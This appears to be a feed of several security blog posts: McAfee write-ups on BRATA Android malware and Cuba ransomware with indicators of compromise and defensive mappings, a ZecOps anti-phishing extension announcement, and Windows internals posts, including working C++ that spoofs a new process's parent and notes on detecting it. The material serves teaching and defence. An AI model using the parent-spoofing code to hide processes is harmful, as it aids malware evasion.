In terms of functionality, BRATA is just another example of how powerful the (ab)use of accessibility services is and how, with just a little bit of social engineering and persistence, cybercriminals can trick users into granting this access to a malicious app and basically getting total control of the infected device. By stealing the PIN, Password or Pattern, combined with the ability to record the screen, click on any button and intercept anything that is entered in an editable field, malware authors can virtually get any data they want, including banking credentials via phishing web pages or even directly from the apps themselves, while also hiding all these actions from the user.

Judging by our findings, the number of apps found in Google Play in 2020 and the increasing number of targeted financial apps, it looks like BRATA will continue to evolve, adding new functionality, new targets, and new obfuscation techniques to target as many users as possible, while also attempting to reduce the risk of being detected and removed from the Play store.

McAfee Mobile Security detects this threat as Android/Brata. To protect yourselves from this and similar threats, employ security software on your mobile devices and think twice before granting access to accessibility services to suspicious apps, even if they are downloaded from trusted sources like Google Play.

Appendix

Techniques, Tactics and Procedures (TTPS)

Figure 10. MITRE ATT&CK Mobile for BRATA

<h3>Indicators of compromise

Apps:

SHA256 Package Name Installs
4cdbd105ab8117620731630f8f89eb2e6110dbf6341df43712a0ec9837c5a9be com.outprotect.android 1,000+
d9bc87ab45b0c786aa09f964a8101f6df7ea76895e2e8438c13935a356d9116b com.privacytitan.android 1,000+
f9dc40a7dd2a875344721834e7d80bf7dbfa1bf08f29b7209deb0decad77e992 com.greatvault.mobile 10,000+
e00240f62ec68488ef9dfde705258b025c613a41760138b5d9bdb2fb59db4d5e com.pw.secureshield 5,000+
2846c9dda06a052049d89b1586cff21f44d1d28f153a2ff4726051ac27ca3ba7 com.defensescreen.application 10,000+

 

URLs:

  • bialub[.]com
  • brorne[.]com
  • jachof[.]com

 

Technical Analysis of BRATA Apps

This paper will analyze five different “Brazilian Remote Access Tool Android” (BRATA) apps found in Google Play during 2020.

View Now

The post BRATA Keeps Sneaking into Google Play, Now Targeting USA and Spain appeared first on McAfee Blog.

McAfee Defender’s Blog: Cuba Ransomware Campaign

6 April 2021 at 17:00

Cuba Ransomware Overview

Over the past year, we have seen ransomware attackers change the way they have responded to organizations that have either chosen to not pay the ransom or have recovered their data via some other means. At the end of the day, fighting ransomware has resulted in the bad actors’ loss of revenue. Being the creative bunch they are, they have resorted to data dissemination if the ransom is not paid. This means that significant exposure could still exist for your organization, even if you were able to recover from the attack.

Cuba ransomware, no newcomer to the game, has recently introduced this behavior.

This blog is focused on how to build an adaptable security architecture to increase your resilience against these types of attacks and specifically, how McAfee’s portfolio delivers the capability to prevent, detect and respond against the tactics and techniques used in the Cuba Ransomware Campaign.

Gathering Intelligence on Cuba Ransomware

As always, building adaptable defensive architecture starts with intelligence. In most organizations, the Security Operations team is responsible for threat intelligence analysis, as well as threat and incident response. McAfee Insights (https://www.mcafee.com/enterprise/en-us/lp/insights-dashboard1.html#) is a great tool for the threat intel analyst and threat responder. The Insights Dashboard identifies prevalence and severity of emerging threats across the globe which enables the Security Operations Center (SOC) to prioritize threat response actions and gather relevant cyber threat intelligence (CTI) associated with the threat, in this case the Cuba ransomware campaign. The CTI is provided in the form of technical indicators of compromise (IOCs) as well as MITRE ATT&CK framework tactics and techniques. As a threat intel analyst or responder you can drill down to gather more specific information on Cuba ransomware, such as prevalence and links to other sources of information. You can further drill down to gather more specific actionable intelligence such as indicators of compromise and tactics/techniques aligned to the MITRE ATT&CK framework.

From the McAfee Advanced Threat Research (ATR) blog, you can see that Cuba ransomware leverages tactics and techniques common to other APT campaigns. Currently, the Initial Access vector is not known. It could very well be spear phishing, exploited system tools and signed binaries, or a multitude of other popular methods.

Defensive Architecture Overview

Today’s digital enterprise is a hybrid environment of on-premise systems and cloud services with multiple entry points for attacks like Cuba ransomware. The work from home operating model forced by COVID-19 has only expanded the attack surface and increased risk for successful spear phishing attacks if organizations did not adapt their security posture and increase training for remote workers. Mitigating the risk of attacks like Cuba ransomware requires a security architecture with the right controls at the device, on the network and in security operations (SecOps). The Center for Internet Security (CIS) Top 20 Cyber Security Controls provides a good guide to build that architecture. As indicated earlier, the exact entry vector used by Cuba ransomware is currently unknown, so what follows, here, are more generalized recommendations for protecting your enterprise.

Initial Access Stage Defensive Overview

According to Threat Intelligence and Research, the initial access for Cuba ransomware is not currently known. As attackers can leverage many popular techniques for initial access, it is best to validate efficacy on all layers of defenses. This includes user awareness training and response procedures, intelligence and behavior-based malware defenses on email systems, web proxy and endpoint systems, and finally SecOps playbooks for early detection and response against suspicious email attachments or other phishing techniques. The following chart summarizes the controls expected to have the most effect against initial stage techniques and the McAfee solutions to implement those controls where applicable.

MITRE Tactic MITRE Techniques CSC Controls McAfee Capability
Initial Access Spear Phishing Attachments (T1566.001) CSC 7 – Email and Web Browser Protection

CSC 8 – Malware Defenses

CSC 17 – User Awareness

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection,

Web Gateway (MWG), Advanced Threat Defense, Web Gateway Cloud Service (WGCS)

Initial Access Spear Phishing Link (T1566.002) CSC 7 – Email and Web Browser Protection

CSC 8 – Malware Defenses

CSC 17 – User Awareness

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection,

Web Gateway (MWG), Advanced Threat Defense, Web Gateway Cloud Service (WGCS)

Initial Access Spear Phishing (T1566.003) Service CSC 7 – Email and Web Browser Protection

CSC 8 – Malware Defenses

CSC 17 – User Awareness

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection,

Web Gateway (MWG), Advanced Threat Defense, Web Gateway Cloud Service (WGCS)

For additional information on how McAfee can protect against suspicious email attachments, review this additional blog post: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-protects-against-suspicious-email-attachments/

Exploitation Stage Defensive Overview

The exploitation stage is where the attacker gains access to the target system. Protection against Cuba ransomware at this stage is heavily dependent on adaptable anti-malware on both end user devices and servers, restriction of application execution, and security operations tools like endpoint detection and response sensors.

McAfee Endpoint Security 10.7 provides a defense in depth capability, including signatures and threat intelligence, to cover known bad indicators or programs, as well as machine-learning and behavior-based protection to reduce the attack surface against Cuba ransomware and detect new exploitation attack techniques. If the initial entry vector is a weaponized Word document with links to external template files on a remote server, for example, McAfee Threat Prevention and Adaptive Threat Protection modules protect against these techniques.

The following chart summarizes the critical security controls expected to have the most effect against exploitation stage techniques and the McAfee solutions to implement those controls where applicable.

MITRE Tactic MITRE Techniques CSC Controls McAfee Portfolio Mitigation
Execution User Execution (T1204) CSC 5 Secure Configuration

CSC 8 Malware Defenses

CSC 17 Security Awareness

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Application Control (MAC), Web Gateway and Network Security Platform
Execution Command and Scripting Interpreter (T1059)

 

CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Application Control (MAC), MVISION EDR
Execution Shared Modules (T1129) CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Application Control (MAC)
Persistence Boot or Autologon Execution (T1547) CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7 Threat Prevention, MVISION EDR
Defensive Evasion Template Injection (T1221) CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, MVISION EDR
Defensive Evasion Signed Binary Proxy Execution (T1218) CSC 4 Control Admin Privileges

CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Application Control, MVISION EDR
Defensive Evasion Deobfuscate/Decode Files or Information (T1027)

 

CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, MVISION EDR

For more information on how McAfee Endpoint Security 10.7 can prevent some of the techniques used in the Cuba ransomware exploit stage, review this additional blog post: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-amsi-integration-protects-against-malicious-scripts/

Impact Stage Defensive Overview

The impact stage is where the attacker encrypts the target system, data and perhaps moves laterally to other systems on the network. Protection at this stage is heavily dependent on adaptable anti-malware on both end user devices and servers, network controls and security operation’s capability to monitor logs for anomalies in privileged access or network traffic. The following chart summarizes the controls expected to have the most effect against impact stage techniques and the McAfee solutions to implement those controls where applicable:

The public leak site of Cuba ransomware can be found via TOR: http://cuba4mp6ximo2zlo[.]onion/

MITRE Tactic MITRE Techniques CSC Controls McAfee Portfolio Mitigation
Discovery Account Discovery (T1087) CSC 4 Control Use of Admin Privileges

CSC 5 Secure Configuration

CSC 6 Log Analysis

MVISION EDR, MVISION Cloud, Cloud Workload Protection
Discovery System Information Discovery (T1082) CSC 4 Control Use of Admin Privileges

CSC 5 Secure Configuration

CSC 6 Log Analysis

MVISION EDR, MVISION Cloud, Cloud Workload Protection
Discovery System Owner/User Discovery (T1033) CSC 4 Control Use of Admin Privileges

CSC 5 Secure Configuration

CSC 6 Log Analysis

MVISION EDR, MVISION Cloud, Cloud Workload Protection
Command and Control Encrypted Channel (T1573) CSC 8 Malware Defenses

CSC 12 Boundary Defenses

Web Gateway, Network Security Platform

 

Hunting for Cuba Ransomware Indicators

As a threat intel analyst or hunter, you might want to quickly scan your systems for any indicators you received on Cuba ransomware. Of course, you can do that manually by downloading a list of indicators and searching with available tools. However, if you have MVISION EDR and Insights, you can do that right from the console, saving precious time. Hunting the attacker can be a game of inches so every second counts. Of course, if you found infected systems or systems with indicators, you can take action to contain and start an investigation for incident response immediately from the MVISION EDR console.

In addition to these IOCs, YARA rules are available in our technical analysis of Cuba ransomware.

IOCs:

Files:

151.bat

151.ps1

Kurva.ps1

 

Email addresses:

under_amur@protonmail[.]ch

helpadmin2@cock[.]li

helpadmin2@protonmail[.]com

iracomp2@protonmail[.]ch

[email protected]

[email protected]

[email protected]

 

Domain:

kurvalarva[.]com

 

Script for lateral movement and deployment:

54627975c0befee0075d6da1a53af9403f047d9e367389e48ae0d25c2a7154bc

c385ef710cbdd8ba7759e084051f5742b6fa8a6b65340a9795f48d0a425fec61

40101fb3629cdb7d53c3af19dea2b6245a8d8aa9f28febd052bb9d792cfbefa6

 

Cuba Ransomware:

c4b1f4e1ac9a28cc9e50195b29dde8bd54527abc7f4d16899f9f8315c852afd4

944ee8789cc929d2efda5790669e5266fe80910cabf1050cbb3e57dc62de2040
78ce13d09d828fc8b06cf55f8247bac07379d0c8b8c8b1a6996c29163fa4b659
33352a38454cfc247bc7465bf177f5f97d7fd0bd220103d4422c8ec45b4d3d0e

672fb249e520f4496e72021f887f8bb86fec5604317d8af3f0800d49aa157be1
e942a8bcb3d4a6f6df6a6522e4d5c58d25cdbe369ecda1356a66dacbd3945d30

907f42a79192a016154f11927fbb1e6f661f679d68947bddc714f5acc4aa66eb
28140885cf794ffef27f5673ca64bd680fc0b8a469453d0310aea439f7e04e64
271ef3c1d022829f0b15f2471d05a28d4786abafd0a9e1e742bde3f6b36872ad
6396ea2ef48aa3d3a61fb2e1ca50ac3711c376ec2b67dbaf64eeba49f5dfa9df

bda4bddcbd140e4012bab453e28a4fba86f16ac8983d7db391043eab627e9fa1

7a17f344d916f7f0272b9480336fb05d33147b8be2e71c3261ea30a32d73fecb

c206593d626e1f8b9c5d15b9b5ec16a298890e8bae61a232c2104cbac8d51bdd

9882c2f5a95d7680626470f6c0d3609c7590eb552065f81ab41ffe074ea74e82

c385ef710cbdd8ba7759e084051f5742b6fa8a6b65340a9795f48d0a425fec61
54627975c0befee0075d6da1a53af9403f047d9e367389e48ae0d25c2a7154bc
1f825ef9ff3e0bb80b7076ef19b837e927efea9db123d3b2b8ec15c8510da647
40101fb3629cdb7d53c3af19dea2b6245a8d8aa9f28febd052bb9d792cfbefa6

00ddbe28a31cc91bd7b1989a9bebd43c4b5565aa0a9ed4e0ca2a5cfb290475ed

729950ce621a4bc6579957eabb3d1668498c805738ee5e83b74d5edaf2f4cb9e

 

MITRE ATT&CK Techniques:

Tactic Technique Observable IOCs
Execution Command and Scripting Interpreter: PowerShell (T1059.001) Cuba team is using PowerShell payload to drop Cuba ransomware f739977004981fbe4a54bc68be18ea79

68a99624f98b8cd956108fedcc44e07c

bdeb5acc7b569c783f81499f400b2745

 

Execution System Services: Service Execution (T1569.002)  

 

Execution Shared Modules (T1129) Cuba ransomware links function at runtime Functions:

“GetModuleHandle”

“GetProcAddress”

“GetModuleHandleEx”

Execution Command and Scripting Interpreter (T1059) Cuba ransomware accepts command line arguments Functions:

“GetCommandLine”

Persistence Create or Modify System Process: Windows Service (T1543.003) Cuba ransomware can modify services Functions:

“OpenService”

“ChangeServiceConfig”

Privilege Escalation Access Token Manipulation (T1134) Cuba ransomware can adjust access privileges Functions:

“SeDebugPrivilege”

“AdjustTokenPrivileges”

“LookupPrivilegeValue”

Defense Evasion File and Directory Permissions Modification (T1222) Cuba ransomware will set file attributes Functions:

“SetFileAttributes”

Defense Evasion Obfuscated files or Information (T1027) Cuba ransomware is using xor algorithm to encode data
Defense Evasion Virtualization/Sandbox Evasion: System Checks Cuba ransomware executes anti-vm instructions
Discovery File and Directory Discovery (T1083) Cuba ransomware enumerates files Functions:

“FindFirstFile”

“FindNextFile”

“FindClose”

“FindFirstFileEx”

“FindNextFileEx”

“GetFileSizeEx”

Discovery Process Discovery (T1057) Cuba ransomware enumerates process modules Functions:

“K32EnumProcesses”

Discovery System Information Discovery (T1082) Cuba ransomware can get keyboard layout, enumerates disks, etc Functions:

“GetKeyboardLayoutList”

“FindFirstVolume”

“FindNextVolume”

“GetVolumePathNamesForVolumeName”

“GetDriveType”

“GetLogicalDriveStrings”

“GetDiskFreeSpaceEx”

Discovery System Service Discovery (T1007) Cuba ransomware can query service status Functions:

“QueryServiceStatusEx”

Collection Input Capture: Keylogging (T1056.001) Cuba ransomware logs keystrokes via polling Functions:

“GetKeyState”

“VkKeyScan”

Impact Service Stop (T1489) Cuba ransomware can stop services
Impact Data encrypted for Impact (T1486) Cuba ransomware encrypts data

 

Proactively Detecting Cuba Ransomware Techniques

Many of the exploit stage techniques in this attack could use legitimate Windows processes and applications to either exploit or avoid detection. We discussed, above, how the Endpoint Protection Platform can disrupt weaponized documents but, by using MVISION EDR, you can get more visibility. As security analysts, we want to focus on suspicious techniques used by Initial Access, as this attack’s Initial Access is unknown.

Monitoring or Reporting on Cuba Ransomware Events

Events from McAfee Endpoint Protection and McAfee MVISION EDR play a key role in Cuba ransomware incident and threat response. McAfee ePO centralizes event collection from all managed endpoint systems. As a threat responder, you may want to create a dashboard for Cuba ransomware-related threat events to understand your current exposure.

Summary

To defeat targeted threat campaigns, defenders must collaborate internally and externally to build an adaptive security architecture which will make it harder for threat actors to succeed and build resilience in the business. This blog highlights how to use McAfee’s security solutions to prevent, detect and respond to Cuba ransomware and attackers using similar techniques.

McAfee ATR is actively monitoring this campaign and will continue to update McAfee Insights and its social networking channels with new and current information. Want to stay ahead of the adversaries? Check out McAfee Insights for more information.

The post McAfee Defender’s Blog: Cuba Ransomware Campaign appeared first on McAfee Blog.

McAfee ATR Threat Report: A Quick Primer on Cuba Ransomware

6 April 2021 at 17:00

Executive Summary 

Cuba ransomware is an older ransomware, that has recently undergone some development. The actors have incorporated the leaking of victim data to increase its impact and revenue, much like we have seen recently with other major ransomware campaigns. 

In our analysis, we observed that the attackers had access to the network before the infection and were able to collect specific information in order to orchestrate the attack and have the greatest impact. The attackers operate using a set of PowerShell scripts that enables them to move laterally. The ransom note mentions that the data was exfiltrated before it was encrypted. In similar attacks we have observed the use of Cobalt Strike payload, although we have not found clear evidence of a relationship with Cuba ransomware. 

We observed Cuba ransomware targeting financial institutions, industry, technology and logistics organizations.  

The following picture shows an overview of the countries that have been impacted according to our telemetry.  

Coverage and Protection Advice 

Defenders should be on the lookout for traces and behaviours that correlate to open source pen test tools such as winPEASLazagne, Bloodhound and Sharp Hound, or hacking frameworks like Cobalt Strike, Metasploit, Empire or Covenant, as well as abnormal behavior of non-malicious tools that have a dual use. These seemingly legitimate tools (e.g., ADfindPSExec, PowerShell, etc.) can be used for things like enumeration and execution. Subsequently, be on the lookout for abnormal usage of Windows Management Instrumentation WMIC (T1047). We advise everyone to check out the following blogs on evidence indicators for a targeted ransomware attack (Part1Part2).  

Looking at other similar Ransomware-as-a-Service families we have seen that certain entry vectors are quite common among ransomware criminals: 

  • E-mail Spear phishing (T1566.001) often used to directly engage and/or gain an initial foothold. The initial phishing email can also be linked to a different malware strain, which acts as a loader and entry point for the attackers to continue completely compromising a victim’s network. We have observed this in the past with the likes of Trickbot & Ryuk or Qakbot & Prolock, etc.  
  • Exploit Public-Facing Application (T1190) is another common entry vector, given cyber criminals are often avid consumers of security news and are always on the lookout for a good exploit. We therefore encourage organizations to be fast and diligent when it comes to applying patches. There are numerous examples in the past where vulnerabilities concerning remote access software, webservers, network edge equipment and firewalls have been used as an entry point.  
  • Using valid accounts (T1078) is and has been a proven method for cybercriminals to gain a foothold. After all, why break the door down if you already have the keys? Weakly protected RDP access is a prime example of this entry method. For the best tips on RDP security, please see our blog explaining RDP security. 
  • Valid accounts can also be obtained via commodity malware such as infostealers that are designed to steal credentials from a victim’s computer. Infostealer logs containing thousands of credentials can be purchased by ransomware criminals to search for VPN and corporate logins. For organizations, having a robust credential management and MFA on user accounts is an absolute must have.  

When it comes to the actual ransomware binary, we strongly advise updating and upgrading endpoint protection, as well as enabling options like tamper protection and Rollback. Please read our blog on how to best configure ENS 10.7 to protect against ransomware for more details. 

For active protection, more details can be found on our website –  https://www.mcafee.com/enterprise/en-us/threat-center/threat-landscape-dashboard/ransomware-details.cuba-ransomware.html – and in our detailed Defender blog. 

Summary of the Threat 

  • Cuba ransomware is currently hitting several companies in north and south America, as well as in Europe.  
  • The attackers use a set of obfuscated PowerShell scripts to move laterally and deploy their attack.  
  • The website to leak the stolen data has been put online recently.  
  • The malware is obfuscated and comes with several evasion techniques.  
  • The actors have sold some of the stolen data 
  • The ransomware uses multiple argument options and has the possibility to discover shared resources using the NetShareEnum API. 

Learn more about Cuba ransomware, Yara Rules, Indicators of Compromise & Mitre ATT&CK techniques used by reading our detailed technical analysis.

The post McAfee ATR Threat Report: A Quick Primer on Cuba Ransomware appeared first on McAfee Blog.

Introducing ZecOps Anti-Phishing Extension

8 April 2021 at 10:10
Introducing ZecOps Anti-Phishing Extension

Phishing is a common social engineering attack that is used by scammers to steal personal information, including authentication credentials and credit card numbers. Being well known for more than 30 years, phishing is still the most common attack performed by cyber-criminals. There have been several attempts at combating phishing attacks, but no attempt has been able to successfully eliminate the problem.

One of the most common attack scenarios involves the attacker sending an email or a text message to the victim. The message, pretending to be from a trustworthy entity, links to a fake website which visually matches a legitimate site. Nowadays, most browsers include limited protection to phishing, relying on a list of known phishing domains. While such protection has value, it’s still easy to bypass.

To help combat phishing attacks, we developed a browser extension that takes a different approach. Instead of trying to determine whether a visited website is a fake website used for phishing, we augment the website with additional visual information, allowing the user to make an informed decision. The user can take into account context that the browser has no way of knowing, such as the origin of the link and the sensitivity of the information about to be entered.

The website identity

One of the most common types of phishing is tricking the user into entering credentials into a fake website. The traditional way of avoiding such phishing is to check the address bar and verify that the address matches the expected, legitimate website. Such a check requires some discipline, and is easy to miss amid a busy day.

The main goal of ZecOps Anti-Phishing Extension is to make it easy to determine the identity of a website, having a visual indication that is difficult to miss.

Take a look at the following example:

Visiting a phishing website without and with the extension
Visiting a phishing website without and with the extension

In this example, the victim navigated to a fake website pretending to be paypal.com. Without the extension (left part of the image), the only difference compared to the real website is a single character in the address bar (1 instead of l in “paypal”). With the extension, the victim gets critical information just before entering his credentials:

  • The website is visited for the first time. For a website such as PayPal, which the victim probably visited multiple times before, this is a red flag.
  • The domain name is very similar to another, well known domain name. In this case, the extension is able to recognize that “paypa1.com” is visually similar to “paypal.com”, making the phishing attempt obvious.
  • The elephant image is the visual identity of the website that the extension generated for paypa1.com, which is most likely to be different from the visual identity of paypal.com. If the victim signs into paypal.com often, he might notice that the image changed and that something is wrong. Users won’t be able to remember all images for all websites, but that’s another measure of caution that can prevent a successful attack, and is more effective for websites that are visited more often.

Misleading links

Another common phishing technique involves sending a message with a link that looks legit, but leads to a different website that is controlled by the attacker. ZecOps Anti-Phishing Extension detects such links and displays a warning message:

A warning about a misleading link
A warning about a misleading link

A word about privacy

We care about our users’ privacy, and so the extension doesn’t send any information back to us. We don’t collect the websites you visit, the messages you see, or anything at all. The only data we collect is through our phishing reporting form that you can voluntarily submit.

Installing the extension

You can get the extension in the extension store for your browser:

Source code

The source code of the extension can be found on GitHub:
ZecOps/anti-phishing-extension

Other ZecOps Projects

We created this project as a community project. If you’d like to learn about the other initiatives we have at ZecOps, we invite you to learn more about ZecOps Mobile EDR / DFIR solutions here.

Next Public Windows Internals training

17 March 2021 at 16:04

I am announcing the next Windows Internals remote training to be held in July 2021 on the 12, 14, 15, 19, 21. Times: 11am to 7pm, London time.

The syllabus can be found here (slight changes are possible if new important topics come up).

Cost and Registration

I’m keeping the cost of these training classes relatively low. This is to make these classes accessible to more people, especially in these unusual and challenging times.

Cost: 800 USD if paid by an individual, 1500 USD if paid by a company. Multiple participants from the same company are entitled to a discount (email me for the details). Previous students of my classes are entitled to a 10% discount.

To register, send an email to [email protected] and specify “Windows Internals Training” in the title. The email should include your name, contact email, and company name (if any).

Later this year I plan a Windows Kernel Programming class. Stay tuned!

As usual, if you have any questions, feel free to send me an email, or DM me on twitter (@zodiacon) or Linkedin (https://www.linkedin.com/in/pavely/).

Platform-Ico-n-Transparent-3-Windows

zodiacon

Parent Process vs. Creator Process

10 January 2021 at 07:51

Normally, a process created by another process in Windows establishes a parent-child relationship between them. This relationship can be viewed in tools such as Process Explorer. Here is an example showing FoxitReader as a child process of Explorer, implying Explorer created FoxitReader. That must be the case, right?

First, it’s important to emphasize that there is no dependency between a child and a parent process in any way. For example, if the parent process terminates, the child is unaffected. The parent is used for inheriting many properties of the child process, such as current directory and environment variables (if not specified explicitly).

Windows stores the parent process ID in the process management object of the child in the kernel for posterity. This also means that the process ID, although correct, could point to a “wrong” process. This can happen if the parent dies, and the process ID is reused.

Process Explorer does not get confused in such a case, and left-justifies the process in its tree view. It knows to check the process creation time. If the “parent” was created after the child, there is no way it could be the real parent. The parent process ID can still be viewed in the process properties:

Notice the “<Non-existent Parent>” indication. Although the parent process ID is known (13636 in this case), there is no other information on that process, as it does not exist anymore, and its ID may or may not have been reused.

By the way, don’t be alarmed that Explorer has no living parent. This is expected, as it’s normally created by a process running the image UserInit.exe, that exits normally after finishing its duties.

Returning to the question raised earlier – is the parent process always the actual creator? Not necessarily.

The canonical example is when a process is launched elevated (for example, by right-clicking it in Explorer and selecting “Run as Administrator”. Here is a diagram showing the major components in an elevation procedure:

First, the user right-clicks in Explorer and asks to run some App.Exe elevated. Explorer calls ShellExecute(Ex) with the verb “runas” that requests this elevation. Next, The AppInfo service is contacted to perform the operation if possible. It launches consent.exe, which shows the Yes/No message box (for true administrators) or a username/password dialog to get an admin’s approval for the elevation. Assuming this is granted, the AppInfo service calls CreateProcessAsUser to launch the App.exe elevated. To maintain the illusion that Explorer created App.exe, it stores the parent ID of Explorer into App.exe‘s new process management block. This makes it look as if Explorer had created App.exe, but is not really what happened. However, that “re-parenting” is probably a good idea in this case, giving the user the expected result.

Is it possible to specify a different parent when creating a process with CreateProcess?

It is indeed possible by using a process attribute. Here is a function that does just that (with minimal error handling):

bool CreateProcessWithParent(DWORD parentId, PWSTR commandline) {
    auto hProcess = ::OpenProcess(PROCESS_CREATE_PROCESS, FALSE, parentId);
    if (!hProcess)
        return false;

    SIZE_T size;
    //
    // call InitializeProcThreadAttributeList twice
    // first, get required size
    //
    ::InitializeProcThreadAttributeList(nullptr, 1, 0, &size);

    //
    // now allocate a buffer with the required size and call again
    //
    auto buffer = std::make_unique<BYTE[]>(size);
    auto attributes = reinterpret_cast<PPROC_THREAD_ATTRIBUTE_LIST>(buffer.get());
    ::InitializeProcThreadAttributeList(attributes, 1, 0, &size);

    //
    // add the parent attribute
    //
    ::UpdateProcThreadAttribute(attributes, 0, 
        PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, 
        &hProcess, sizeof(hProcess), nullptr, nullptr);

    STARTUPINFOEX si = { sizeof(si) };
    //
    // set the attribute list
    //
    si.lpAttributeList = attributes;
    PROCESS_INFORMATION pi;

    //
    // create the process
    //
    BOOL created = ::CreateProcess(nullptr, commandline, nullptr, nullptr, 
        FALSE, EXTENDED_STARTUPINFO_PRESENT, nullptr, nullptr, 
        (STARTUPINFO*)&si, &pi);

    //
    // cleanup
    //
    ::CloseHandle(hProcess);
    ::DeleteProcThreadAttributeList(attributes);

    return created;
}

The first step is to open a handle to the “prospected” parent by calling OpenProcess with the PROCESS_CREATE_PROCESS access mask. This means you cannot choose an arbitrary process, you must have at least that access to the process. Protected (and protected light) processes, for example, cannot be used as parents in this way, as PROCESS_CREATE_PROCESS cannot be obtained for such processes.

Next, an attribute list is created with a single attribute of type PROC_THREAD_ATTRIBUTE_PARENT_PROCESS by calling InitializeProcThreadAttributeList followed by UpdateProcThreadAttribute to set up the parent handle. Finally, CreateProcess is called with the extended STARTUPINFOEX structure where the attribute list is stored. CreateProcess must know about the extended version by specifying EXTENDED_STARTUPINFO_PRESENT in its flags argument.

Here is an example where Excel supposedly created Notepad (it really didn’t). The “real” process creator is nowhere to be found.

The obvious question perhaps is whether there is any way to know which process was the real creator?

The only way that seems to be available is for kernel drivers that register for process creation notifications with PsSetCreateProcessNotifyRoutineEx (or one of its variants). When such a notification is invoked in the driver, the following structure is provided:

typedef struct _PS_CREATE_NOTIFY_INFO {
  SIZE_T              Size;
  union {
    ULONG Flags;
    struct {
      ULONG FileOpenNameAvailable : 1;
      ULONG IsSubsystemProcess : 1;
      ULONG Reserved : 30;
    };
  };
  HANDLE              ParentProcessId;
  CLIENT_ID           CreatingThreadId;
  struct _FILE_OBJECT *FileObject;
  PCUNICODE_STRING    ImageFileName;
  PCUNICODE_STRING    CommandLine;
  NTSTATUS            CreationStatus;
} PS_CREATE_NOTIFY_INFO, *PPS_CREATE_NOTIFY_INFO;

On the one hand, there is the ParentProcessId member (although it’s typed as HANDLE, it actually the parent process ID). This is the parent process as set by CreateProcess based on the code snippet in CreateProcessWithParent.

However, there is also the CreatingThreadId member of type CLIENT_ID, which is a small structure containing a process and thread IDs. This is the real creator. In most cases it’s going to have the same process ID as ParentProcessId, but not in the case where a different parent has been specified.

After this point, that information goes away, leaving only the parent ID, as it’s the one stored in the EPROCESS kernel structure of the child process.

Update: (thanks to @jdu2600)

The creator is available by listening to the process create ETW event, where the creator is the one raising the event. Here is a snapshot from my own ProcMonXv2:

runelevated-1

zodiacon

Next Public (Remote) Training Classes

29 October 2020 at 20:44

I am announcing the next Windows Internals remote training to be held in January 2021 on the 19, 21, 25, 27, 28. Times: 11am to 7pm, London time.

The syllabus can be found here.

I am also announcing a new training, requested by quite a few people, Windows System Programming. The dates are in February 2021: 8, 9, 11, 15, 17. Times: 12pm to 8pm, London time.

The syllabus can be found here.

Cost and Registration

I’m keeping the cost of these training classes relatively low. This is to make these classes accessible to more people, especially in these challenging times. If you register for both classes, you get 10% off the second class. Previous students of my classes get 10% off as well.

Cost: 750 USD if paid by an individual, 1500 USD if paid by a company. Multiple participants from the same company are entitled to a discount (email me for the details).

To register, send an email to [email protected] and specify “Training” in the title. The email should include the training(s) you’re interested in, your name, contact email, company name (if any) and preferred time zone. The training times have already been selected, but it’s still good to know which time zone you live in.

As usual, if you have any questions, feel free to shoot me an email, or DM me on twitter (@zodiacon) or Linkedin (https://www.linkedin.com/in/pavely/).

Platform-Ico-n-Transparent-3-Windows

zodiacon

Upcoming Public Remote Training

24 July 2020 at 14:49

I have recently completed another successful iteration of the Windows Internals training – thank you those who participated!

I am announcing two upcoming training classes, Windows Internals and Windows Kernel Programming.

Windows Internals (5 days)

I promised some folks that the next Internals training would be convenient to US-based time zones. That said, all time zones are welcome!

Dates: Sep 29, Oct 1, 5, 7, 8
Times: 8am to 4pm Pacific time (11am to 7pm Eastern)

The syllabus can be found here. I may make small changes in the final topics, but the major topics remain the same.

Windows Kernel Programming (4 days)

Dates: Oct 13, 15, 19, 21
Times: TBA

The syllabus can be found here. Again, slight changes are possible. This is a development-heavy course, so be prepared to write lots of code!

The selected time zone will be based on the majority of participants’ preference.

Cost and Registration

The cost for each class is kept relatively low (as opposed to other, perhaps similar offerings), as I’ve done in the past year or so. This is to make these classes accessible to more people, especially in these challenging times. If you register for both classes, you get 10% off the second class. Previous students of my classes get 10% off as well.

Cost: 750 USD if paid by an individual, 1500 USD if paid by a company. Multiple participants from the same company are entitled to a discount (email me for the details).

To register, send an email to [email protected] and specify “Training” in the title. The email should include your name, company name (if any) and preferred time zone.

Please read carefully the pre-requisites of each class, especially for Windows Kernel Programming. In case of doubt, talk to me.

If you have any questions, feel free to shoot me an email, or DM me on twitter (@zodiacon) or Linkedin (https://www.linkedin.com/in/pavely/).

For Companies

Companies that are interested in such (or other) training classes receive special prices. Topics can also be customized according to specific needs.

Other classes I provide include: Modern C++ Programming, Windows System Programming, COM Programming, C#/.NET Programming (Basic and Advanced), Advanced Windows Debugging, and more. Contact me for detailed syllabi if interested.

Platform-Ico-n-Transparent-3-Windows

zodiacon

Creating Registry Links

17 July 2020 at 18:55

The standard Windows Registry contains some keys that are not real keys, but instead are symbolic links (or simply, links) to other keys. For example, the key HKEY_LOCAL_MACHINE\System\CurrentControlSet is a symbolic link to HKEY_LOCAL_MACHINE\System\ControlSet001 (in most cases). When working with the standard Registry editor, RegEdit.exe, symbolic links look like normal keys, in the sense that they behave as the link’s target. The following figure shows the above mentioned keys. They look exactly the same (and they are).

There are several other existing links in the Registry. As another example, the hive HKEY_CURRENT_CONFIG is a link to (HKLM is HKEY_LOCAL_MACHINE) HKLM\SYSTEM\CurrentControlSet\Hardware Profiles\Current.

